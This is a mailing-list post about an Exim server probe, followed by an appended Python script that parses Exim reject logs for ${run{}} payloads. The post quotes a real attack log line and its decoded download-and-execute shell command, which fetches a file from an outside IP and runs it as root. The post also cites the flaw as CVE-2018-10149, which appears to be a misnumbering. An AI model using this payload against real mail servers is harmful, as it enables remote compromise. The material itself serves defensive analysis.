nanog mailing list archives

Re: Russian Anal Probing + Malware


From: Andy Smith <andy () strugglers net>
Date: Sun, 23 Jun 2019 04:04:13 +0000

Hello,

On Sat, Jun 22, 2019 at 11:01:13AM -0600, Keith Medcalf wrote:
> What malware slinging?

Some user there is trying to exploit CVE-2018-10149:

2019-06-11 11:28:35 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "RCPT TO:<bin+${run{\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22}}@myhostname>" H=(myhostname) [89.248.171.57] next input="QUIT\n"

Plus another 17 attempts by that IP through to 19 June.

$ printf "\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22\n"
/bin/sh -c "wget --no-check-certificate -T 36 hxxps://185.162.235.211/ldm1ip -O /root/.yyearz && sh /root/.yyearz -n &"

(I replaced https with hxxps to prevent auto-link-followers from
hitting the site.)

Cheers,
Andy
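The decoding Andy does by hand with printf above can be done in bulk over an Exim reject log. The following is an added example, not code from the post or from Exim: it scans log lines for a `${run{...}}` expansion item in a rejected RCPT TO, decodes the `\xNN` escapes the same way Exim's string expander would, and returns the timestamp, source IP and decoded command for each hit so a defender can see what was attempted and count attempts per source. The log lines embedded below are constructed for the example (documentation-range IPs and a harmless `id` command), not the ones from the post.

```python
import re
from collections import Counter

# Constructed sample Exim log excerpt: one ${run{...}} probe with hex-escaped
# payload, followed by an ordinary relay rejection that must NOT match.
SAMPLE_LOG = r"""
2019-06-11 11:28:35 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "RCPT TO:<bin+${run{\x2fbin\x2fsh\x20\x2dc\x20\x22id\x22}}@myhostname>" H=(myhostname) [192.0.2.10] next input="QUIT\n"
2019-06-11 11:30:02 H=mail.example.net [198.51.100.7] F=<alice@example.net> rejected RCPT <nobody@myhostname>: relay not permitted
2019-06-12 08:15:41 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "RCPT TO:<bin+${run{\x2fbin\x2fsh\x20\x2dc\x20\x22uname\x20\x2da\x22}}@myhostname>" H=(myhostname) [192.0.2.10] next input="QUIT\n"
"""

# \xNN escapes as written in the envelope address.
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
# The ${run{...}} expansion item; the inner payload contains no braces because
# it is entirely hex-escaped, so a non-greedy match up to the first "}}" works.
RUN_EXPANSION = re.compile(r"\$\{run\{(.*?)\}\}")
# Exim writes the peer address in square brackets after the H= field.
SOURCE_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def decode_exim_escapes(text: str) -> str:
    """Turn \\xNN sequences into the characters they encode (what Exim's
    expander would do when it evaluated the string)."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def extract_run_payloads(log_text: str) -> list[dict]:
    """Return one record per log line carrying a ${run{...}} item in a
    rejected RCPT TO: timestamp, source IP and the decoded command."""
    hits = []
    for line in log_text.splitlines():
        if "rejected" not in line or "RCPT" not in line:
            continue
        run = RUN_EXPANSION.search(line)
        if run is None:
            continue
        ip = SOURCE_IP.search(line)
        hits.append({
            "timestamp": line[:19],  # Exim's default "YYYY-MM-DD HH:MM:SS" prefix
            "source_ip": ip.group(1) if ip else None,
            "command": decode_exim_escapes(run.group(1)),
        })
    return hits


def attempts_per_source(hits: list[dict]) -> dict[str, int]:
    """Count probe attempts per source IP, for blocklisting or reporting."""
    return dict(Counter(h["source_ip"] for h in hits))


if __name__ == "__main__":
    found = extract_run_payloads(SAMPLE_LOG)
    for h in found:
        print(f'{h["timestamp"]} {h["source_ip"]} -> {h["command"]}')
    print("attempts per source:", attempts_per_source(found))
```

Run against a real `/var/log/exim4/rejectlog` the same parser applies unchanged; the "relay not permitted" line in the sample is there to show that ordinary rejections are ignored, only lines containing an expansion item in the recipient are reported.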

